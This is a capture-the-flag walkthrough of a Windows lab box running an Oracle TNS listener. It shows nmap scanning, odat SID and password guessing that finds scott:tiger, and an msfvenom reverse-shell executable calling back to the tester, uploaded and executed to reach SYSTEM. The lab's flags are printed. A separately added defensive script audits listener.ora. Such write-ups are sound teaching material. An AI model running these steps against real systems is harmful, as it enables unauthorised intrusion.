Service overview

$ /opt/nmapAutomator/nmapAutomator.sh -H 10.10.10.82 -t Full

PORT      STATE SERVICE      VERSION
80/tcp    open  http         Microsoft IIS httpd 8.5
| http-methods: 
|_  Potentially risky methods: TRACE
|_http-server-header: Microsoft-IIS/8.5
|_http-title: IIS Windows Server
135/tcp   open  msrpc        Microsoft Windows RPC                                            
139/tcp   open  netbios-ssn  Microsoft Windows netbios-ssn                                    
445/tcp   open  microsoft-ds Microsoft Windows Server 2008 R2 - 2012 microsoft-ds             
1521/tcp  open  oracle-tns   Oracle TNS listener 11.2.0.2.0 (unauthorized)                    
49153/tcp open  msrpc        Microsoft Windows RPC
49154/tcp open  msrpc        Microsoft Windows RPC
49160/tcp open  oracle-tns   Oracle TNS listener (requires service name)
49161/tcp open  msrpc        Microsoft Windows RPC
49162/tcp open  msrpc        Microsoft Windows RPC
Service Info: OSs: Windows, Windows Server 2008 R2 - 2012; CPE: cpe:/o:microsoft:windows

Host script results:
|_clock-skew: mean: 4m34s, deviation: 0s, median: 4m34s
| smb-security-mode: 
|   authentication_level: user
|   challenge_response: supported
|_  message_signing: supported
| smb2-security-mode: 
|   2.02: 
|_    Message signing enabled but not required
| smb2-time: 
|   date: 2021-06-01T10:05:35
|_  start_date: 2021-06-01T09:57:54

https://github.com/bongbongco/CVE-2012-1675

$ nmap -Pn -sT --script=+oracle-tns-poison -p 1521 10.10.10.82
PORT     STATE SERVICE
1521/tcp open  oracle
|_oracle-tns-poison: Host is vulnerable!
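A defender-side check for the issue the nmap script reports above, added here as an example and not part of the original write-up: it parses a listener.ora and flags a listener that still accepts unrestricted remote instance registration. The parameter names SECURE_REGISTER_<listener>, VALID_NODE_CHECKING_REGISTRATION_<listener> and DYNAMIC_REGISTRATION_<listener> are Oracle's COST / valid-node registration settings; both listener.ora samples are constructed, not taken from the target.

```python
import re

# Constructed listener.ora sample (not taken from the target in the write-up).
WEAK_LISTENER_ORA = """
LISTENER =
  (DESCRIPTION_LIST =
    (DESCRIPTION =
      (ADDRESS = (PROTOCOL = TCP)(HOST = 0.0.0.0)(PORT = 1521))
    )
  )
"""

# Same listener with Oracle's registration restrictions added.
HARDENED_LISTENER_ORA = WEAK_LISTENER_ORA + """
SECURE_REGISTER_LISTENER = (IPC)            # COST: register only over IPC
VALID_NODE_CHECKING_REGISTRATION_LISTENER = ON
"""

_PARAM_RE = re.compile(r"^([A-Za-z0-9_]+)\s*=\s*(.*)$")


def parse_params(text):
    """Collect top-level NAME = VALUE lines of a listener.ora (comments stripped)."""
    params = {}
    for raw in text.splitlines():
        line = raw.split("#", 1)[0].strip()
        m = _PARAM_RE.match(line)
        if m:
            params[m.group(1).upper()] = m.group(2).strip().upper()
    return params


def audit_listener_ora(text, listener="LISTENER"):
    """Return findings (empty list = hardened) for the named listener."""
    p = parse_params(text)
    name = listener.upper()
    findings = []
    # Dynamic registration disabled entirely: remote poisoning is not possible.
    if p.get(f"DYNAMIC_REGISTRATION_{name}") == "OFF":
        return findings
    secure = p.get(f"SECURE_REGISTER_{name}")
    if secure is None or "TCP" in secure:
        findings.append("remote instance registration allowed over TCP "
                        f"(set SECURE_REGISTER_{name} = (IPC))")
    # Conservative: require the valid-node check to be set explicitly.
    vnc = p.get(f"VALID_NODE_CHECKING_REGISTRATION_{name}")
    if vnc in (None, "OFF", "0"):
        findings.append("no valid-node check on registration "
                        f"(set VALID_NODE_CHECKING_REGISTRATION_{name} = ON)")
    return findings


if __name__ == "__main__":
    for label, cfg in (("weak", WEAK_LISTENER_ORA), ("hardened", HARDENED_LISTENER_ORA)):
        print(label, audit_listener_ora(cfg) or ["ok"])
```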

Public exploit

odat standalone
https://github.com/quentinhardy/odat/releases/download/5.1/odat-linux-libc2.12-x86_64.tar.gz

Finding SIDs:

$ ./odat-libc2.12-x86_64 sidguesser -s 10.10.10.82 -p 1521
[+] SIDs found on the 10.10.10.82:1521 server: XE
$ wget https://raw.githubusercontent.com/quentinhardy/odat/master-python3/accounts/accounts.txt

Finding passwords:

$ ./odat-libc2.12-x86_64 passwordguesser -s 10.10.10.82 -p 1521 -d XE --accounts-file accounts.txt

=> scott:tiger

Shell

$ msfvenom -p windows/x64/shell/reverse_tcp LHOST=10.10.14.6 LPORT=1234 -f exe -o shell.exe
$ ./odat-libc2.12-x86_64 utlfile -s 10.10.10.82 -p 1521 -U scott -P tiger -d XE --sysdba --putFile c:/ shell.exe shell.exe
[1] (10.10.10.82:1521): Put the shell.exe local file in the c:/ folder like shell.exe on the 10.10.10.82 server                                                                             
[+] The shell.exe file was created on the c:/ directory on the 10.10.10.82 server like the shell.exe file
$ msfconsole
$ ./odat-libc2.12-x86_64 externaltable -s 10.10.10.82 -p 1521 -U scott -P tiger -d XE --sysdba --exec C:/ shell.exe

Flags

> whoami
nt authority\system
C:\Users\Phineas\Desktop>ipconfig
Windows IP Configuration
Ethernet adapter Ethernet0:
   Connection-specific DNS Suffix  . : 
   IPv4 Address. . . . . . . . . . . : 10.10.10.82
   Subnet Mask . . . . . . . . . . . : 255.255.255.0
   Default Gateway . . . . . . . . . : 10.10.10.2
Tunnel adapter isatap.{50CD6E47-E5C7-44A8-B294-BA01E18B9E30}:
   Media State . . . . . . . . . . . : Media disconnected
   Connection-specific DNS Suffix  . : 
C:\Users\Phineas\Desktop>type user.txt
92ede778a1cc8d27cb6623055c331617
C:\Users\Administrator\Desktop>ipconfig
Windows IP Configuration
Ethernet adapter Ethernet0:
   Connection-specific DNS Suffix  . : 
   IPv4 Address. . . . . . . . . . . : 10.10.10.82
   Subnet Mask . . . . . . . . . . . : 255.255.255.0
   Default Gateway . . . . . . . . . : 10.10.10.2
Tunnel adapter isatap.{50CD6E47-E5C7-44A8-B294-BA01E18B9E30}:
   Media State . . . . . . . . . . . : Media disconnected
   Connection-specific DNS Suffix  . : 
C:\Users\Administrator\Desktop>type root.txt
cd39ea0af657a495e33bc59c7836faf6